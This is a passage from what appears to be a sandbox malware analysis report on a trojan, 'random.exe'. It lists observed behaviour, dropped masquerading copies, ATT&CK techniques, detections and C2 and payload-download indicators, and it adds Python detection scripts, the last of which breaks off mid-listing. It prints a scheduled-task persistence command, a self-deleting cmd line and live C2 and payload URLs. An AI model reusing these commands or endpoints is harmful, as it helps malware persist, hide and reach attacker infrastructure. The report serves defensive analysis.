Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 36064
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35939
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35814
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35689
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35564
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35439
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35314
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35189
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 35064
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34939
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34814
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34689
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34564
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34439
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34314
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34189
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 34064
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33939
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33814
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33657
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33544
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33435
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 33324
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39830
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39703
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39578
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39469
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39346
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39221
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 39096
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38920
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38721
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38451
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38345
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38221
Source: C:\Users\user\Desktop\random.exe | Thread delayed: delay time: 38096
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 39830
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 39690
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 39565
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 39449
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 39323
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 39098
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 38979
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 38860
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 38608
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 38502
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 38377
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Thread delayed: delay time: 38252
Source: random.exe, 00000001.00000002.2010343903.0000000006934000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\random.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\random.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\random.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\random.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /SC ONLOGON /TN "TaskHelper" /TR "C:\Users\user\Desktop\random.exe" /F
Source: C:\Users\user\Desktop\random.exe | Process created: C:\Users\user\AppData\Roaming\cEp3d38.exe "C:\Users\user\AppData\Roaming\cEp3d38.exe"
Source: C:\Users\user\Desktop\random.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "C:\Users\user\Desktop\random.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 4000
Source: C:\Users\user\Desktop\random.exe | Queries volume information: C:\Users\user\Desktop\random.exe VolumeInformation
Source: C:\Users\user\Desktop\random.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Desktop\random.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Desktop\random.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\cEp3d38.exe | Queries volume information: C:\Users\user\AppData\Roaming\cEp3d38.exe VolumeInformation
Source: C:\Users\user\Desktop\random.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match | File source: random.exe, type: SAMPLE
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 1.0.random.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1340004308.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: random.exe PID: 1380, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\OneDrive\jdownloader.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows multimedia platform.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\autoit3.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windowspowershell.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\reference assemblies.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\common files.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows mail.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\microsoft.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows defender.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows sidebar.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows photo viewer.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\msecache.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\java.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\internet explorer.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\mozilla maintenance service.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows nt.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\random.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\microsoft.net.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows media player.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\google.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\microsoft office.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows portable devices.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\msbuild.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\cEp3d38.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: random.exe, type: SAMPLE
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 1.0.random.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2010343903.00000000069B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1340004308.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: random.exe PID: 1380, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\OneDrive\jdownloader.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows multimedia platform.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\autoit3.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windowspowershell.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\reference assemblies.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\common files.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows mail.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\microsoft.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows defender.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows sidebar.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows photo viewer.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\msecache.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\java.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\internet explorer.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\mozilla maintenance service.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows nt.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\random.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\microsoft.net.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows media player.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\google.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\microsoft office.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\windows portable devices.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\OneDrive\msbuild.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\cEp3d38.exe, type: DROPPED
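Both Yara lists above name the same 23 copies of the bot dropped under C:\Users\user\OneDrive\, each named after a Program Files sub-directory (windows defender.exe, common files.exe, java.exe, ...). The following is an added example, not Joe Sandbox or sample code, that turns that naming trick into a check over a directory listing. The listing is constructed, and the set of Program Files names is an assumption (it mirrors the names this sample used); on a real host derive it from a clean reference image.

```python
"""Flag dropped executables named after Program Files directories.

Added example, not Joe Sandbox or sample code. The report lists copies of the
bot under C:\\Users\\user\\OneDrive\\ named after well-known Program Files
folders ("windows defender.exe", "common files.exe", "java.exe", ...); this
check generalises that naming trick to any user-writable drop location. The
directory listing below is constructed, and the folder-name list is an
assumption to be replaced with names taken from a clean reference image."""
import ntpath
from collections import Counter

# Assumed baseline of Program Files sub-directory names (lower-case); it
# mirrors the names this sample used rather than a real inventory.
PROGRAM_FILES_DIRS = {
    "common files", "internet explorer", "java", "microsoft office",
    "mozilla maintenance service", "msbuild", "reference assemblies",
    "windows defender", "windows mail", "windows media player",
    "windows multimedia platform", "windows nt", "windows photo viewer",
    "windows portable devices", "windows sidebar", "windowspowershell",
    "microsoft.net", "msecache", "google", "microsoft", "jdownloader", "autoit3",
}
# Per-user locations this sample wrote to; Program Files itself is excluded.
USER_DROP_ROOTS = ("\\onedrive\\", "\\appdata\\roaming\\", "\\desktop\\")


def is_pe(head: bytes) -> bool:
    """Cheap PE check on the first bytes: the DOS stub starts with 'MZ'."""
    return head[:2] == b"MZ"


def masquerading_hits(listing):
    """listing: iterable of (path, first_bytes).

    Returns the paths that are PE files inside a user-writable drop root whose
    file name (minus .exe) is a Program Files directory name."""
    hits = []
    for path, head in listing:
        low = path.lower()
        if not is_pe(head) or not any(root in low for root in USER_DROP_ROOTS):
            continue
        stem, ext = ntpath.splitext(ntpath.basename(low))
        if ext == ".exe" and stem in PROGRAM_FILES_DIRS:
            hits.append(path)
    return hits


def drop_clusters(hits, threshold=3):
    """Directories holding at least `threshold` hits: a mass drop like the
    OneDrive copies in this report is a stronger signal than any single file."""
    counts = Counter(ntpath.dirname(p) for p in hits)
    return {d: n for d, n in counts.items() if n >= threshold}


# Constructed listing: three masquerading copies, one randomly named copy this
# rule deliberately does not catch (it needs a different rule), benign files.
SAMPLE_LISTING = [
    (r"C:\Users\user\OneDrive\windows defender.exe", b"MZ\x90\x00"),
    (r"C:\Users\user\OneDrive\common files.exe", b"MZ\x90\x00"),
    (r"C:\Users\user\OneDrive\java.exe", b"MZ\x90\x00"),
    (r"C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe", b"MZ\x90\x00"),
    (r"C:\Program Files\Java\jre1.8.0_381\bin\java.exe", b"MZ\x90\x00"),
    (r"C:\Users\user\OneDrive\windows defender.txt", b"note"),
    (r"C:\Users\user\OneDrive\budget.xlsx", b"PK\x03\x04"),
]

if __name__ == "__main__":
    found = masquerading_hits(SAMPLE_LISTING)
    print("\n".join(found))
    print(drop_clusters(found))
```

The randomly named copy (mmzjdoev....exe) is left for a separate rule on purpose: this check is about the masquerade, and the cluster count catches the mass drop even when a few names fall outside the baseline list.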
MITRE ATT&CK matrix, listed per tactic in the report's row order. Leading digits are the report's per-technique signature-count badges as extracted; cells without a count are the matrix's unmatched template entries.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 121 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 11 Process Injection; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 File Deletion; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 211 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 123 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph (ID: 1592066, Sample: random.exe, Start date: 15/01/2025, Architecture: WINDOWS, Score: 100). Numbers in parentheses after a process name are the graph's created-registry-value and created-file counters as displayed.

Start
  DNS/IP: tmpfiles.org
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 7 other signatures
  Started: random.exe (16, 234); random.exe; random.exe; random.exe

random.exe (main instance)
  DNS/IP: 87.120.126.5, 59239, 80, UNACS-AS-BG8000BurgasBG, Bulgaria; tmpfiles.org 104.21.21.16, 443, 59240, 59241, CLOUDFLARENETUS, United States
  Dropped: C:\Users\user\...\windowspowershell.exe, PE32; C:\Users\user\OneDrive\windows sidebar.exe, PE32; C:\Users\...\windows portable devices.exe, PE32; 38 other malicious files
  Signatures: Protects its processes via BreakOnTermination flag; Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Self deletion via cmd or bat file; Uses schtasks.exe or at.exe to add and modify task schedules
  Started: cEp3d38.exe; cmd.exe (1); schtasks.exe (1)

cEp3d38.exe
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

cmd.exe
  Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
  Started: conhost.exe; PING.EXE (1)

schtasks.exe
  Started: conhost.exe

Source | Detection | Scanner | Label
random.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
random.exe | 32% | Virustotal |
random.exe | 100% | Avira | HEUR/AGEN.1351936
random.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\random.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\microsoft.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\autoit3.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\java.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\jdownloader.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\internet explorer.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\msecache.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\common files.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\mozilla maintenance service.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\reference assemblies.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\microsoft.net.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\AppData\Roaming\cEp3d38.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\google.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\microsoft office.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\OneDrive\msbuild.exe | 100% | Avira | HEUR/AGEN.1351936
C:\Users\user\AppData\Roaming\random.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\microsoft.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\autoit3.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\java.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\jdownloader.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\internet explorer.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\msecache.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\common files.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\mozilla maintenance service.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\reference assemblies.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\microsoft.net.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\cEp3d38.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\google.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\microsoft office.exe | 100% | Joe Sandbox ML |
C:\Users\user\OneDrive\msbuild.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\cEp3d38.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Roaming\random.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\autoit3.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\common files.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\google.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\internet explorer.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\java.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\jdownloader.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\microsoft office.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\microsoft.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\microsoft.net.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\mmzjdoevgizobizuwenrntjysakvaaofwgwplryd.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\mozilla maintenance service.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\msbuild.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\msecache.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\reference assemblies.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\windows defender.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\windows mail.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\windows media player.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\windows multimedia platform.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\windows nt.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\windows photo viewer.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\windows portable devices.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\windows sidebar.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\OneDrive\windowspowershell.exe | 21% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
http://tmpfiles.org/dl/19480319/anubis.exe | 0% | Avira URL Cloud | safe
https://tmpfiles.org | 0% | Avira URL Cloud | safe
http://tmpfiles.org | 0% | Avira URL Cloud | safe
http://87.120.126.5 | 0% | Avira URL Cloud | safe
http://87.120.126.5/VmCetSC7/page.php | 0% | Avira URL Cloud | safe
https://tmpfiles.org/dl/19480319/anubis.exe | 0% | Avira URL Cloud | safe
http://tmpfiles.orgd | 0% | Avira URL Cloud | safe
http://87.120.126.5/VmCetSC7/page.phpP | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tmpfiles.org | 104.21.21.16 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://tmpfiles.org/dl/19480319/anubis.exe | false | Avira URL Cloud: safe | unknown
http://87.120.126.5/VmCetSC7/page.php | true | Avira URL Cloud: safe | unknown
https://tmpfiles.org/dl/19480319/anubis.exe | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://87.120.126.5 | random.exe, 00000001.00000002.2008201035.000000000339F000.00000004.00000800.00020000.00000000.sdmp; random.exe, 00000001.00000002.2008201035.00000000033A7000.00000004.00000800.00020000.00000000.sdmp; random.exe, 00000001.00000002.2008201035.00000000032CD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tmpfiles.orgd | random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp; random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://tmpfiles.org | random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tmpfiles.org | random.exe, 00000001.00000002.2008201035.0000000003365000.00000004.00000800.00020000.00000000.sdmp; random.exe, 00000001.00000002.2008201035.0000000003326000.00000004.00000800.00020000.00000000.sdmp; random.exe, 00000001.00000002.2008201035.0000000003315000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | random.exe, 00000001.00000002.2008201035.00000000031A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://87.120.126.5/VmCetSC7/page.phpP | random.exe, 00000001.00000002.2008201035.000000000339F000.00000004.00000800.00020000.00000000.sdmp; random.exe, 00000001.00000002.2008201035.00000000031A2000.00000004.00000800.00020000.00000000.sdmp; random.exe, 00000001.00000002.2008201035.00000000033A7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.21.16 | tmpfiles.org | United States | 13335 | CLOUDFLARENETUS | false
87.120.126.5 | unknown | Bulgaria | 25206 | UNACS-AS-BG8000BurgasBG | true
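The URL and IP tables above give the network indicators: the C2 endpoint http://87.120.126.5/VmCetSC7/page.php (flagged malicious by the report even though Avira URL Cloud rates it safe, so the report's verdict rather than the scanner label should drive detection) and the tmpfiles.org download of anubis.exe. The following is an added example, not part of the Joe Sandbox report: it scans constructed proxy log lines for those indicators. The log line format and client addresses are invented; the payload rule is generalised beyond the one URL to any tmpfiles.org/dl/<digits>/<name>.exe download, because the context table further down shows the same host serving pohtent.exe to a related sample.

```python
"""Match this report's network indicators against proxy log lines.

Added example, not Joe Sandbox code. The log format and client addresses are
constructed; the indicators are the C2 URL the report marks malicious and the
tmpfiles.org payload URL it lists. The payload rule is generalised: the report
shows tmpfiles.org/dl/<id>/anubis.exe for this sample and
tmpfiles.org/dl/<id>/pohtent.exe for a related one, so it keys on the host and
the /dl/<digits>/<name>.exe shape rather than one exact URL."""
import re
from urllib.parse import urlsplit

C2_HOST = "87.120.126.5"
C2_PATH = "/VmCetSC7/page.php"
PAYLOAD_HOST = "tmpfiles.org"
PAYLOAD_PATH = re.compile(r"^/dl/\d+/[^/]+\.exe$", re.I)

# Constructed line shape: "<iso-timestamp> <client-ip> <METHOD> <url> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")


def classify_url(url):
    """Return (severity, rule) when the URL matches an indicator, else None.

    Matching is on host + path, so trailing junk such as the memory-string
    artefact 'page.phpP' above degrades to the host-only rule instead of
    slipping through."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host, path = (parts.hostname or ""), parts.path
    if host == C2_HOST and path == C2_PATH:
        return ("high", "litehttp_c2_beacon")
    if host == C2_HOST:
        return ("medium", "litehttp_c2_host")
    if host == PAYLOAD_HOST and PAYLOAD_PATH.match(path):
        return ("medium", "tmpfiles_exe_download")
    return None


def scan_log(lines):
    """Return (client, rule, severity, url) for every matching, parseable line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip rather than abort the whole scan
        verdict = classify_url(m["url"])
        if verdict:
            severity, rule = verdict
            hits.append((m["client"], rule, severity, m["url"]))
    return hits


def hosts_to_isolate(hits):
    """Clients with a high-severity hit, i.e. observed C2 beaconing."""
    return sorted({client for client, _, sev, _ in hits if sev == "high"})


SAMPLE_LOG = [  # constructed records, not taken from the report
    "2025-01-15T17:10:30Z 10.0.0.21 GET https://tmpfiles.org/dl/19480319/anubis.exe 200",
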